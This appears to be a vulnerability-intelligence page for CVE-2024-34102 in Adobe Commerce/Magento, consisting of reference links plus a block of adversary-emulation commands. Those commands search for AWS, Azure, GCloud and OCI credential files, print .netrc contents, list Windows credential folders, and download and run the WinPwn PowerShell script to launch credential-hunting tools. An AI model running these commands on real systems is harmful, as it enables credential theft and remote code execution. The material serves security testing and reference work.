find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-34102 |
| helpx.adobe.com |
GitHub CVE
vendor-advisory
|
https://helpx.adobe.com/security/products/magento/apsb24-40.html |
| vicarius.io |
GitHub CVE
|
https://www.vicarius.io/vsociety/posts/cosmicsting-critical-unauthenticated-xxe-vulnerability-in-adobe-commerce-and-magento-cve-2024-34102 |
| cisa.gov |
NVD API
Third Party Advisory
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-34102 |